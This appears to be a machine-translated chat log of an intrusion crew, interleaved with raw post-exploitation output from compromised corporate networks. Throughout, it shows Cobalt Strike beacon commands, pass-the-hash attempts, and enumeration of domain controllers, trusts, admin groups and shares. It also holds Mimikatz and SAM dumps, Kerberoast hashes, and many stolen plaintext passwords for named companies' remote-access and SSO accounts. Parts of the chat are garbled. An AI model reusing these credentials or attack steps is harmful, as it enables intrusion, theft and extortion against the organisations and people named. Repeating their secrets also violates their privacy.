192.0.2.48:22 (SSH-2.0-dropbear) 192.0.2.39:22 (SSH-2.0-dropbear) 192.0.2.24:22 (SSH-2.0-dropbear) 192.0.2.15:22 (SSH-2.0-OpenSSH_4.3) 192.0.2.9:22 (SSH-2.0-dropbear) 192.0.2.4:22 (SSH-2.0-dropbear) 192.168.72.100:22 (SSH-2.0-dropbear) 192.168.72.77:22 (SSH-2.0-dropbear) 192.168.72.55:22 (SSH-2.0-dropbear) 192.0.2.250:443 192.0.2.250:80 192.0.2.250:22 (SSH-2.0-OpenSSH_6.2 PKIX) - did not open, the tab in the browser is called "Document Moved" 192.0.2.242:443 192.0.2.242:80 - failed to open 192.0.2.237:80 - did not open, "TDSi Ethernet to Serial Module" tab 192.0.2.235:443 192.0.2.235:80 - failed to open 192.0.2.234:443 192.0.2.234:80 - did not open --- Chromium Credential (User: nreid) --- URL : http://192.0.2.234/wcd/login.cgi Username : Password : 1234567812345678 192.0.2.233:443 192.0.2.233:80 - failed to open 192.0.2.232:80 - did not open, "TDSi Ethernet to Serial Module" tab 
192.0.2.230:443 192.0.2.230:80 - failed to open 192.0.2.222:443 192.0.2.222:80 - failed to open 192.0.2.219:80 - does not open all the way, "Hewlett Packard" tab, blue panel on the left with the hp logo 192.0.2.191:80 - Hewlett Packard tab did not open 192.0.2.190:443 192.0.2.190:80 - failed to open 192.0.2.95:8080 - it didn't open 192.168.3.206:443 - failed to open 192.168.3.204:443 - failed to open 192.168.3.130:443 - failed to open 192.168.15.252:80 - did not open, "NETGEAR" tab 192.168.15.251:80 - did not open, "NETGEAR" tab 192.168.15.206:443 192.168.15.206:80 - it didn't open 192.168.15.106:80 - didn't open 192.168.72.200:443 192.168.72.200:80 - it didn't open 192.168.72.158:80 - didn't open 192.0.3.10:80 - it didn't open 10.0.180.4:443 10.0.180.4:80 - did not open ``Entry : g84.p4.webrootcloudav.comhttps://www.webroot.com/us/en``` BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?!? ``I haven't run into this suite in general, it doesn't matter, if there is it must be with doppelgänger averländernen in filtrechek malware alerte in video logger voor voor aletztige logiweb gui monitoring systema voor dezeen nowsoxx voor dezeen, give me a screenshot of it```. https://en.wikipedia.org/wiki/Intelligent_Platform_Management_Interface ``Give me a link@tl1 @tl2 Have not encountered IPMI? What is this thing? 
``Scanner module is complete`` ``on the forum access is closedDrop user1 everywhere + change the pass in the general resources, his coba will be closed within 2 hoursI thought I was going to the wrong forum)) oops fucked up, already raised) and what domain? It is lying) why?
yes, so good that now themselves on the forum do not get) @user1 account on the forum and everywhere else is closed? Maybe less detects than the current active, or additional functionalityI have not looked, it does not develop. The point of it? Another analogue on the empire? Of course I tried different ones. At different ports.Pointed to the inner ipe? Ratnik does not work, no bounce check those 2 softy about which above wrote? Yes, I know, they just do not yet (sessions would ususer1 does not work with us.I have you offlineWhat do you mean where? Where is @user1 @user3? https://www.youtube.com/watch?v=OvESADFx2eE Scheme of a remote MITM attack on the WSUS system https://www.securitylab.ru/analytics/479780.php user9 Good day quotqq hint problems with cryptamines wasn't scheduled today what's up? List of domain trusts: 0: WINONA winona.rtpco.local (Forest 2) (Direct Outbound) 1: ALLOY us.alloypolymers.com (Direct Outbound) (Direct Inbound) 2: RTPCO rtpco.local (Forest tree root) (Primary Domain) (Native) ``` contiguous YES between RTPCO and ALLOY: ``` cancelet sagert ``` there is no contiguous YES with WINONA there may be contiguous info than you entered the trust you can poke what is left you have data from the trust Group name Enterprise Admins Comment Designated administrators of the enterprise System error 8519 has occurred. A global group cannot have a cross-domain member. `````` Get list of DCs in domain 'rtpco.local' from '\\HendDC1.rtpco.local'.
MNDomain6.rtpco.local [DS] Site: Winona HendDC1.rtpco.local [DS] Site: Henderson TXDC2.rtpco.local [DS] Site: texas TXDC1.rtpco.local [DS] Site: texas HendDC2.rtpco.local [DS] Site: Henderson VADC2.rtpco.local [DS] Site: VA VADC1.rtpco.local [DS] Site: VA MXDC2.rtpco.local [DS] Site: Mexico MXDC1.rtpco.local [DS] Site: Mexico ShenzDC1.rtpco.local [DS] Site: China SingDC1.rtpco.local [DS] Site: Singapore ShenzDC2.rtpco.local [DS] Site: China SuzhouDC1.rtpco.local [DS] Site: Suzhou SuzhouDC2.rtpco.local [DS] Site: Suzhou FranceDC1.rtpco.local [DS] Site: France FranceDC2.rtpco.local [DS] Site: France GermanyDC1.rtpco.local [DS] Site: Germany GermanyDC2.rtpco.local [DS] Site: Germany INDC2.rtpco.local [DS] Site: Indy DC1Poland.rtpco.local [DS] Site: Poland DC2Poland.rtpco.local [DS] Site: Poland NVDC1.rtpco.local [DS] Site: Nevada OrangeDC.rtpco.local [DS] Site: Orange MNDC2.rtpco.local [PDC] [DS] Site: Winona INDYDC1.rtpco.local [DS] Site: Indy CrocketDC1.rtpco.local [DS] Site: Crocket PolandDC1.rtpco.local [DS] Site: Poland OHDC.rtpco.local [DS] Site: Ohio `````` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator arobinsona cancelet kaseyaservice O365Service sagert spicescan ``rtpcompany.com dats amaizing joni)eee beacon> shell dir \\89.0.192.165\C$ [*] Tasked beacon to run: dir \\89.0.192.165\C$ [+] host called home, sent: 52 bytes [+] received output: Volume in drive \89.0.192.165\C$ has no label. Volume Serial Number is FC6D-43E6 Directory of \89.0.192.165$ 03/12/2018 03:08 PM 1,523 cdata.log 01/04/2021 10:27 AM kworking 08/22/2013 09:52 AM PerfLogs 12/26/2020 04:18 PM Program Files 05/22/2019 04:39 PM Program Files (x86) 01/01/2021 09:00 AM Temp 09/19/2018 09:59 AM Users 12/26/2020 04:18 PM Windows 1 File(s) 1,523 bytes 7 Dir(s) 63,537,639,424 bytes free ``Check with the admin on the server skul''. 
Global Group memberships *VSA_Admins *Test_Alloy *IT *SQL Server Admins ``Well datak you in the network or not? and the two sessions that I asked respawned again deadspavnas not workwith the domain also can not without the token however can not get the list dk and shuffled the point instead of the domain did tokenak came tried admin hash that above skinnytoo long with waterwaytut how are we doing?let's work with this grid for a while now. we can hang and graze again during working hours, when they appear ))[ ](https://mediaeveryone.com/group/sccy-com?msg=5NtMf6XhACe6Q8yyJ) Sure, they have a lot of data there)) it would be cool to get into the network of these guys) probably through a VPN go to several computers that are in the Invey and then do not pingnet 445 sees? well ping 10.0.0.96 does not pass it kakip does not ping?maybe yesVannData is a company that configured them backupsThere's also an odd thing - I hung invey and he caught something like `10.0.0.96 VANNDATA\patykr` but such IP is not pinged, I think, perhaps it's just those outsourcers via vpn or something like that ... no. There's no way to find the IT guys. They are logged in a couple of places but under YES codes, and even chrome is empty under them. The network is small, maybe outsource? It's necessary in any case: there are the cracks from one NAS, and no cracks from the system that manages backups and one NAS on all machines in the domain: I checked all the files through SauronEye and manually, took off the chrome-dump - found no cracks of interest. Downloaded a backup of the mail IT specialist, there is correspondence on the implementation of backups, but no passwords in the mail. In addition, the people involved in the correspondence about the backups (2019), now in the AD are absent341 pc.Looking for computers from the same OU as the current username only in routervpn seems to nouchuchit in the beginning - more was. strange as tovhodny point behind the vpn?see himself and the printer 445 see? 
and i want to do so, but is not pinging nihilo check other machines in this group for admin rights? clearly the system You have a local user admindae and what? i am again dumb? you took off the hell why?i will smb login to check if i find something, maybe from here there are routes to somewhere else, because he can not get a list of DCs, and around no one else no other options? i'll scan the network in large chunks, maybe i'll find someone ... and the rest checked?there's nowhere to put you put the kerbs? there's no one around, i have to jump on the dk, i guess it's LAa needed for the local accounta you did for a specific car the domain is still .pth W08872612198\"Remote Support" 296c19b3d2cb8e8729e5fe27f6cf764a in quotes did you do that? definitely better `` user : remote support domain : W08872612198 program : C:\Windows\system32\cmd.exe /c echo 083dd8b28e4 > \.\pipe\f5604a impers. : no NTLM : 296c19b3d2cb8e8729e5fe27f6cf764a | PID 48836 | TID 39276 | LSA Process is now R/W | LUID 0 ; 1888192397 (00000000:708b878d) \_ msv1_0 - data copy @ 000002A8A21DC080 : OK ! \_ kerberos - ``It doesn't look like it came out remote? user : remote domain : W08872612198 program : C:\Windows\system32\cmd.exe /c echo 6d969cf0c1b > \\.\pipe\36c22c impers. : no NTLM : 296c19b3d2cb8e8729e5fe27f6cf764a | PID 1112 | TID 37960 | LSA Process is now R/W | LUID 0 ; 1888127822 (00000000:708a8b4e) \_ msv1_0 - data copy @ 000002A8A1FDF650 : OK ! \_ kerberos - ``I think it worked.'' Try the goo. How do you defeat the gap? beacon> pth ".\Remote Support" aad3b435b51404eeaad3b435b51404ee:296c19b3d2cb8e8729e5fe27f6cf764a [-] pth error: argument 'Support' is not an NTLM hash Why don't you use the remote support account? There's also the LA, I'll try with it...can I put them there? 
$krb5tgs$23$*scom$jdossn.local$MSSQLSvc/jdoscom02.jdossn.local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``Clear no, but this is YES``$krb5tgs$23$*svc_scomsql_2019$jdossn.local$MSSQLSvc/JDOSCOMDB61B.jdossn.local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``Clear no''. Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Jason:1003:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4::: Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:296c19b3d2cb8e8729e5fe27f6cf764a::: W08872612198:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:039c94e617f2f4dd3651ee3873e640ea::: ``LA ``` Administrator JDOSSN\Domain Admins JDOSSN\NDLEADING_All_Users JDOSSN_DLEADING_Computer_Account_Admins JDOSSN/Sedona_CROPS_Admins Remote Support W08872612198 The command completed successfully. ``EA ``` [*] Tasked beacon to run: net group "enterprise admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain jdossn.local. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- The command completed successfully. ``DA ``` Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- a900221 AuditDB_svc AuditJDOSSNDA DHSAdmin jdodmp_svc MPXAXDAgentAccount PAM_PRD_JDO_EQI_01 PAM_PRD_JDO_EQI_02 scom svc_audit svc_BuildAutomator svc_exchange svc_OMAA svc_OMDAS svc_OMREAD svc_scomsql_2019 svc_snow_preprod The command completed successfully. ``net accounts ``` Force user logoff how long after time expires? 
Minimum password age (days): 1 Maximum password age (days): 84 Minimum password length: 10 Length of password history maintained: 24 Lockout threshold: 8 Lockout duration (minutes): Never Lockout observation window (minutes): 15 Computer role: BACKUP The command completed successfully. I don't see anything about the correct domain, I haven't cleaned it out i just renamed the confab. why did they clean it out? and can you tell me the name of the PC where you came from? epcusa.com i will pass it on somehow the domain is admin it means you have to reopen it. current time2020-12-23, 00:42:57a what about a day ago? it's more like a year ago2020-12-22, 01:01:54 what was on the net now I'll check it tell me what needs to be reopened $krb5tgs$23$*spps2007$epctech.com$MSSQLSvc/SQLSRV03.epctech.com ``There don't seem to be any sessions expected, but I made it here. $krb5tgs$23$*avman$epctech.com$MSSQLSvc/ Kaspersky2013 ````somerd.com` live session here beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes [+] received output: televisa.com.mx ``` Hey, what time should we come in tomorrow? And we haven't got the comps yet, they'll be tomorrow oskin in lx, when they come will throw in the bruttoroogi no timlid or what? to whom to give the hash? 
\JDOXADIRC1.jdossn.local\ADMIN$ - Remote Admin \JDOXADIRC1.jdossn.local\C$ - Default share \JDOXADIRC1.jdossn.local\IPC$ - Remote IPC \W088726111915.ndleading.jdossn.local\ADMIN$ - Remote Admin \W088726111915.ndleading.jdossn.local\C$ - Default share \W088726111915.ndleading.jdossn.local\IPC$ - Remote IPC \W088726111915.ndleading.jdossn.local\print$ - Printer Drivers \W088726111915.ndleading.jdossn.local\Upstairs Printer - Upstairs Printer \WW08872611194.ndleading.jdossn.local\ADMIN$ - Remote Admin \W08872611194.ndleading.jdossn.local\C$ - Default share \W08872611194.ndleading.jdossn.local\IPC$ - Remote IPC \WW08872611194.ndleading.jdossn.local\nic - nic \WW08872611194.ndleading.jdossn.local\print$ - Printer Drivers \\JDOFIEECONN01.jdossn.local/ADMIN$ - Remote Admin \JDOFIEECONN01.jdossn.local\C$ - Default share \JDOFIEECONN01.jdossn.local/IPC$ - Remote IPC \JDOXADIRD1.jdossn.local/ADMIN$ - Remote Admin \JDOXADIRD1.jdossn.local\C$ - Default share \JDOXADIRD1.jdossn.local\IPC$ - Remote IPC \JDOdc65.jdossn.local/ADMIN$ - Remote Admin \JDOdc65.jdossn.local\C$ - Default share \JDOdc65.jdossn.local\DealerConfig - \JDOdc65.jdossn.local\EQAPP - \JDOdc65.jdossn.local\EQDBBackup - \JDOdc65.jdossn.local\EQPROF - \JDOdc65.jdossn.local\EQUIPArchive - \JDOdc65.jdossn.local\EQUIPAttachments - \JDOdc65.jdossn.local\EQUIPREPORTS - \JDOdc65.jdossn.local\HomeDirs - \JDOdc65.jdossn.local\IPC$ - Remote IPC \\Lockouts - Lockout logs \JDOdc65.jdossn.local\MISCPROF - \JDOdc65.jdossn.local\MXHomeDirs - \JDOdc65.jdossn.local\MXShares - \JDOdc65.jdossn.local\NETLOGON - Logon server share \\Logon server share \JDOdc65.jdossn.local\SD - \JDOdc65.jdossn.local/SDAttach - \JDOdc65.jdossn.local/SDPROF - \JDOdc65.jdossn.local\Shares - \JDOdc65.jdossn.local\SYSVOL - Logon server share \W08987711192.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W8987711192.ndleading.jdossn.local\C$ - Default share \W0W8987711192.ndleading.jdossn.local\IPC$ - Remote IPC 
\WW08987711192.ndleading.jdossn.local\NPI02DE8A (HP LaserJet 400 M401dne) - NPI02DE8A (HP LaserJet 400 M401dne) \\{\W08987711192.ndleading.jdossn.local\print$ - Printer Drivers \W0W8987711192.ndleading.jdossn.local\TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4) - HP Color LaserJet Pro M478f-9f PCL-6 (V4) ``D33r3123`` aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee `````` dn:CN=Administrators,CN=Builtin,DC=jdossn,DC=local >objectClass: top >objectClass: group >cn: Administrators >description: Administrators have complete and unrestricted access to the computer/domain >member: CN=VMjoinJDOSSN Group,OU=VM Clone Customization,OU=Service Accounts,DC=jdossn,DC=local >member: CN=a900221,OU=Patrol,OU=Service Accounts,DC=jdossn,DC=local >member: CN=Operations_All_Users,OU=Groups,OU=Operations,OU=JDIS,DC=jdossn,DC=local >member: CN=CAG,OU=Citrix,OU=Service Accounts,DC=jdossn,DC=local >member: CN=Enterprise Admins,CN=Users,DC=jdossn,DC=local >member: CN=Domain Admins,CN=Users,DC=jdossn,DC=local >member: CN=DHSAdmin,CN=Users,DC=jdossn,DC=local `````` https://cloudsso.cisco.com/,https://cloudsso.cisco.com/sp/startSSO.ping,7/27/2018 11:23:30 AM,13177182210062277,nicd@leadingedgeequip.com,vgy7vgy7VGY ``Microadmin. 
``` * Username : ndmicdgeorg * Domain : JDOSSN * NTLM : 053a03895fad0c33bb088137941ec5bc * SHA1 : 27f1f87e2764ab71e5c971af2119f9750b2e01c0 * DPAPI : 57c9711ddeb916f0bce56ce6f6fe6a `````` http://directwi.jdossn.local/,http://directwi.jdossn.local/Citrix/XenAppDirectWI/auth/login.aspx,5/30/2017 12:20:27 PM,13140638427060024,ndcarddalma,bhu8bhu8 `````` * Username : ndmictrobin * Domain : JDOSSN * NTLM : 23a7ccf40635bc590c3c98dbeed94e01 * SHA1 : b2907d5a9d75a60ddcb5ac994c26f5c567d83db2 `````` https://account.activedirectory.windowsazure.com/,https://account.activedirectory.windowsazure.com/ChangePassword.aspx,4/30/2019 10:30:51 AM,13201111851838636,,sWKwEcC2T:Gq62X `````` https://sso.cisco.com/,https://sso.cisco.com/autho/forms/CDClogin.html,7/30/2018 9:01:24 AM,13177432884691813,nicd@leadingedgeequip.com,vgy7vgy7VGY `````` [00000003] Primary * Username : ndmictflana * Domain : JDOSSN * NTLM : 7bba5ae0ee513a322b7cf6b8768bb063 * SHA1 : 758182c25f76e6b83dbdaba52642e49326f558d9 `````` https://iduiaas.cloudapps.cisco.com/,https://iduiaas.cloudapps.cisco.com/web/registrationForm,7/27/2018 11:18:23 AM,13177181903702855,nicd@leadingedgeequip.com,vgy7vgy7VGY ``Go to the domain itself mb there redirect different, there since 2014 access is preserved) go to the full link? Well, it still does not work to the fact that it itself is external and I do not know whether through it to go to the domainada neti from outside do not go it is an external citra? 2fa ``` https://leadingedgeequip.screenconnect.com/Login,4/12/2020 10:11:37 PM,13231221097720457,blainee@leadingedgeequip.com,NDleading2020$ ``[ ](https://mediaeveryone.com/group/snpartners-com?msg=TL63esuKb3YtfHDKq) doesn't go to the link, not even under the proxy of the machine you took it out of ``. https://w08041911191-ndleading-jdossn-local-wocqspajes.app01-17.logmein.com/,5/1/2020 3:42:22 PM,13232839342283382,nddevbernst,Nrb11232010! 
`````` https://micservice190-ndleading-jdossn-local-arzkebwqmq.lmi-app14-01.logmein.com/,10/20/2020 11:15:16 AM,13247684116208716,nddevbernst,NDleading2021! `````` https://identity.webrootanywhere.com/,https://identity.webrootanywhere.com/v1/Account/login,3/16/2020 3:54:55 PM,13228865695219331,blainee@leadingedgeequip.com,ShadowFox5640! https://johndeere.okta.com/,https://johndeere.okta.com/login/login.htm,3/13/2020 2:09:15 PM,13228600155038654,X096743,Nrb11232010! https://desktop-0bog84e-mlppczciax.app12-08.logmein.com/,https://desktop-0bog84e-mlppczciax.app12-08.logmein.com/,2/5/2020 11:22:52 AM,13225396972110903,nddevbernst,mko0MKO)mko0MKO) https://leadingedgeequip.screenconnect.com/Login,4/12/2020 10:11:37 PM,13231221097720457,blainee@leadingedgeequip.com,NDleading2020$ https://w08041912191-hewsstpmaj.app12-11.logmein.com/,https://w08041912191-hewsstpmaj.app12-11.logmein.com/,4/29/2020 8:54:24 AM,13232642064233077,nddevbernst,Nrb11232010! https://reports.secureexchange.net/,https://reports.secureexchange.net/admin/login.aspx,4/29/2020 3:26:37 PM,13232665597610069,PARTS100,Parts100 https://reports.secureexchange.net/,https://reports.secureexchange.net/admin/login.aspx,5/1/2020 10:48:43 AM,13232821723796642,devi201,Deere100 https://desktop-0bog84e-cmilwzrpyj.app01-22.logmein.com/,https://desktop-0bog84e-cmilwzrpyj.app01-22.logmein.com/,8/26/2020 7:41:36 AM,13242919296305003,nddevbernst,Combine20! ``As long as he's caught with Citrix, try to get started too,`` by the way. https://remotedesktop.google.com/,https://remotedesktop.google.com/access,8/27/2019 5:48:39 PM,13211419719369994,Blaine Home PC,11232010 `````` https://res.cisco.com/websafe/register,12/29/2016 10:16:37 AM,13127501797078616,Ernst,Jibs5640 `````` https://heritage-webapps.cvty.com/Citrix/Heritage-XenApp/auth/login.aspx,5/21/2014 7:11:20 AM,13045147880000000,A579851,oneway$5 `````` * Username : nddevbernst * Domain : JDOSSN * NTLM : 5b622ad5d550408ed6260c2b8fb185cc * Password : Tractor20! 
* Username : nddevkodell * Domain : JDOSSN * NTLM : 8de4a768f02760e576c5a5bb59c97771 * Username : nddeviowlbo * Domain : JDOSSN * NTLM : 4fd547943802ebb200777a443d3b06a4 * Password : NDspring2020 `````` \JDOXADCD3.jdossn.local\ADMIN$ - Remote Admin \JDOXADCD3.jdossn.local\C$ - Default share \JDOXADCD3.jdossn.local\CtxSTShare - \JDOXADCD3.jdossn.local\IPC$ - Remote IPC ``Check yet and it's not forbidden here``. beacon> shell wmic /node:10.28.92.159 OS GET Name [*] Tasked beacon to run: wmic /node:10.28.92.159 OS GET Name [+] host called home, sent: 66 bytes [+] received output: Node - 10.28.92.159 ERROR: Description = The RPC server is unavailable. \W080332420b ndleading jdossn local\ADMIN$ - Remote Admin \W080332420b.ndleading.jdossn.local\ADMIN$ - Remote Admin \W080332420b.ndleading.jdossn.local\C$ - Default share \W080332420b.ndleading.jdossn.local\D$ - Default share \W080332420b.ndleading.jdossn.local\IPC$ - Remote IPC \W080332420b.ndleading.jdossn.local\Nic's Printer - Nic's Printer \W080332420b.ndleading.jdossn.local\print$ - Printer Drivers \W0W80332420b.ndleading.jdossn.local\Upstairs MFP M477 PCL 6 - Upstairs MFP M477 PCL 6 \\W080332420b.ndleading.jdossn.local\Users - ``or access to the rps service in general the admin ball should indicate the possibility of using the vmik utility and he just spit and spit them slowly still in the lab I remember how to run not glance at how sharpshare looks sharpsharefinder gives results already after the full completion of the scan so it's like sharpshare not in my processes so it's spit out noo sharfinder I ran it without output to a file not hashdump not do mimic not output under the system the session is nuts I don't know what it even is or still not working it's still working but I xvorvor it's sharfinder JID PID Description --- --- ----------- 51 72412 process 52 218268 process 74,996 PowerShell (Unmanaged) ``in johns* yesterday SharpShares was hanging in processes I don't know what of it SharpShares saw admin balls 
there? and yesterday it didn't spit out these balls came to the office now ShareFinder yesterday I used SharpShares before weekend at all low grade mystic scans no[ ](https://mediaeveryone.com/group/snpartners-com?msg=7BD3u87LJ9Rfyu3Nf) 1[ ](https://mediaeveryone.com/group/snpartners-com?msg=gNjQhyMhNFSrXhBXx) - then to the question above beacon> shell dir \\10.28.92.159\ADMIN$ [*] Tasked beacon to run: dir \\10.28.92.159\ADMIN$ [+] host called home, sent: 56 bytes [+] received output: Access is denied. ``I still have a list of folders in admin ball?`` I immediately did "copy" on accessibility in the plan? how did you check the balls? but when I copy the case - Access is deleted then daon sees them how? on the ball for some reason it is not allowed in the subnet other than under that polzak above? there are many admin ball? [+] received output: \JDODHCP02.jdossn.local\ADMIN$ - Remote Admin \JDODHCP02.jdossn.local\C$ - Default share \JDODHCP02.jdossn.local\IPC$ - Remote IPC [+] received output: \tannerflanigan.ndleading.jdossn.local\ADMIN$ - Remote Admin \tannerflanigan.ndleading.jdossn.local\C$ - Default share \tannerflanigan.ndleading.jdossn.local\IPC$ - Remote IPC \tannerflanigan.ndleading.jdossn.local\NPI602973 (HP LaserJet 400 M401dne) - Back Shop \tannerflanigan.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \\JDOSQLEAST1C.jdossn.local\ADMIN$ - Remote Admin \JDOSQLEAST1C.jdossn.local\C$ - Default share \JDOSQLEAST1C.jdossn.local\E$ - Default share \JDOSQLEAST1C.jdossn.local\G$ - Default share \JDOSQLEAST1C.jdossn.local/IPC$ - Remote IPC \JDOSQLEAST1C.jdossn.local\J$ - Default share \JDOSQLEAST1C.jdossn.local\M$ - Default share \JDOSQLEAST1C.jdossn.local/Q$ - Default share \JDOSQLEAST1C.jdossn.local\T$ - Default share \JDOSQLEAST1C.jdossn.local\V$ - Default share [+] received output: \W0W8987711192.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W8987711192.ndleading.jdossn.local\C$ - Default share 
\W0W8987711192.ndleading.jdossn.local\IPC$ - Remote IPC \WW08987711192.ndleading.jdossn.local\NPI02DE8A (HP LaserJet 400 M401dne) - NPI02DE8A (HP LaserJet 400 M401dne) \\{\W08987711192.ndleading.jdossn.local\print$ - Printer Drivers \W0W8987711192.ndleading.jdossn.local\TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4) - HP Color LaserJet Pro M478f-9f PCL-6 (V4) [+] received output: \\JDODC61.jdossn.local\ADMIN$ - Remote Admin \JDODC61.jdossn.local\C$ - Default share \JDODC61.jdossn.local/IPC$ - Remote IPC \JDODC61.jdossn.local/Lockouts - \JDODC61.jdossn.local/NETLOGON - Logon server share \JDODC61.jdossn.local\SYSVOL - Logon server share [+] received output: \JDOXADIRC1.jdossn.local\ADMIN$ - Remote Admin \JDOXADIRC1.jdossn.local\C$ - Default share \JDOXADIRC1.jdossn.local\IPC$ - Remote IPC [+] received output: \\JDODHCP04.jdossn.local\ADMIN$ - Remote Admin \JDODHCP04.jdossn.local\C$ - Default share \JDODHCP04.jdossn.local\IPC$ - Remote IPC [+] received output: \DESKTOP-GCPB49A.ndleading.jdossn.local\ADMIN$ - Remote Admin \DESKTOP-GCPB49A.ndleading.jdossn.local\C$ - Default share \DESKTOP-GCPB49A.ndleading.jdossn.local\D$ - Default share \DESKTOP-GCPB49A.ndleading.jdossn.local\IPC$ - Remote IPC \DESKTOP-GCPB49A.ndleading.jdossn.local/NPI7CF108 (HP Color LaserJet MFP M477fdw) - NPI7CF108 (HP Color LaserJet MFP M477fdw) \DESKTOP-GCPB49A.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \W0887261216KO.ndleading.jdossn.local\ADMIN$ - Remote Admin \W0W887261216KO.ndleading.jdossn.local\C$ - Default share \W0W887261216KO.ndleading.jdossn.local\D$ - Default share \W0W887261216KO.ndleading.jdossn.local\E$ - Default share \W0W887261216KO.ndleading.jdossn.local\IPC$ - Remote IPC \W0887261216KO.ndleading.jdossn.local\print$ - Printer Drivers [+] received output: \\JDOdc65.jdossn.local\ADMIN$ - Remote Admin \JDOdc65.jdossn.local\C$ - Default share \JDOdc65.jdossn.local\DealerConfig - \JDOdc65.jdossn.local\EQAPP - \JDOdc65.jdossn.local\EQDBBackup - 
\JDOdc65.jdossn.local\EQPROF - \JDOdc65.jdossn.local\EQUIPArchive - \JDOdc65.jdossn.local\EQUIPAttachments - \JDOdc65.jdossn.local\EQUIPREPORTS - \JDOdc65.jdossn.local\HomeDirs - \JDOdc65.jdossn.local\IPC$ - Remote IPC \\Lockouts - Lockout logs \JDOdc65.jdossn.local\MISCPROF - \JDOdc65.jdossn.local\MXHomeDirs - \JDOdc65.jdossn.local\MXShares - \JDOdc65.jdossn.local\NETLOGON - Logon server share \\Logon server share \JDOdc65.jdossn.local\SD - \JDOdc65.jdossn.local/SDAttach - \JDOdc65.jdossn.local/SDPROF - \JDOdc65.jdossn.local\Shares - \JDOdc65.jdossn.local\SYSVOL - Logon server share [+] received output: \\Jdodc51.jdossn.local\ADMIN$ - Remote Admin \Jdodc51.jdossn.local\C$ - Default share \Jdodc51.jdossn.local\D$ - Default share \\Jdodc51.jdossn.local\F$ - Default share \Jdodc51.jdossn.local\IPC$ - Remote IPC \Jdodc51.jdossn.local/Lockouts - \Jdodc51.jdossn.local/NETLOGON - Logon server share \\{\Jdodc51.jdossn.local\print$ - Printer Drivers \Jdodc51.jdossn.local\SYSVOL - Logon server share [+] received output: \DNDMIC61.jdossn.local\ADMIN$ - Remote Admin \DNDMIC61.jdossn.local\C$ - Default share \DNDMIC61.jdossn.local\IPC$ - Remote IPC [+] received output: \\JDOSQLEAST1D.jdossn.local\ADMIN$ - Remote Admin \JDOSQLEAST1D.jdossn.local\C$ - Default share \JDOSQLEAST1D.jdossn.local\E$ - Default share \JDOSQLEAST1D.jdossn.local\G$ - Default share \JDOSQLEAST1D.jdossn.local/IPC$ - Remote IPC \JDOSQLEAST1D.jdossn.local\J$ - Default share \JDOSQLEAST1D.jdossn.local\M$ - Default share \JDOSQLEAST1D.jdossn.local/Q$ - Default share \JDOSQLEAST1D.jdossn.local\T$ - Default share \JDOSQLEAST1D.jdossn.local\V$ - Default share [+] received output: \JDOXADCC3.jdossn.local\ADMIN$ - Remote Admin \JDOXADCC3.jdossn.local\C$ - Default share \JDOXADCC3.jdossn.local\CtxSTShare - \JDOXADCC3.jdossn.local\IPC$ - Remote IPC [+] received output: \JDOXADIRD1.jdossn.local\ADMIN$ - Remote Admin \JDOXADIRD1.jdossn.local\C$ - Default share \JDOXADIRD1.jdossn.local\IPC$ - Remote IPC [+] received 
output: \jdopbi01.jdossn.local\ADMIN$ - Remote Admin \jdopbi01.jdossn.local\C$ - Default share \jdopbi01.jdossn.local\IPC$ - Remote IPC [+] received output: \KNDMICEQRD61.jdossn.local\ADMIN$ - Remote Admin \KNDMICEQRD61.jdossn.local\ASAData - \KNDMICEQRD61.jdossn.local\ASALogs - \KNDMICEQRD61.jdossn.local\Backups - \KNDMICEQRD61.jdossn.local\C$ - Default share \KNDMICEQRD61.jdossn.local\E$ - Default share \KNDMICEQRD61.jdossn.local\G$ - Default share \KNDMICEQRD61.jdossn.local\IPC$ - Remote IPC \KNDMICEQRD61.jdossn.local\L$ - Default share \KNDMICEQRD61.jdossn.local\M$ - Default share \KNDMICEQRD61.jdossn.local\MirrorLogs - \KNDMICEQRD61.jdossn.local\P$ - Default share \KNDMICEQRD61.jdossn.local\SQLRemote - \KNDMICEQRD61.jdossn.local\T$ - Default share \KNDMICEQRD61.jdossn.local\Temp - [+] received output: \\JDODC69.jdossn.local\ADMIN$ - Remote Admin \JDODC69.jdossn.local\C$ - Default share \JDODC69.jdossn.local\IPC$ - Remote IPC \JDODC69.jdossn.local/lockouts - \JDODC69.jdossn.local/NETLOGON - Logon server share \JDODC69.jdossn.local\SYSVOL - Logon server share [+] received output: \\JDODC64.jdossn.local\ADMIN$ - Remote Admin \JDODC64.jdossn.local\C$ - Default share \JDODC64.jdossn.local\DealerConfig - \JDODC64.jdossn.local\EQAPP - \JDODC64.jdossn.local\EQDBBackup - \JDODC64.jdossn.local\EQPROF - \JDODC64.jdossn.local\EQUIPArchive - \JDODC64.jdossn.local\EQUIPAttachments - \JDODC64.jdossn.local\EQUIPREPORTS - \JDODC64.jdossn.local\HomeDirs - \JDODC64.jdossn.local\IPC$ - Remote IPC \JDODC64.jdossn.local/lockouts - \JDODC64.jdossn.local\MISCPROF - \JDODC64.jdossn.local\MXHomeDirs - \JDODC64.jdossn.local\MXShares - \JDODC64.jdossn.local\NETLOGON - Logon server share \\JDODC64.jdossn.local/SD \\SD - SDAttach - SDAttach - SDAttach. 
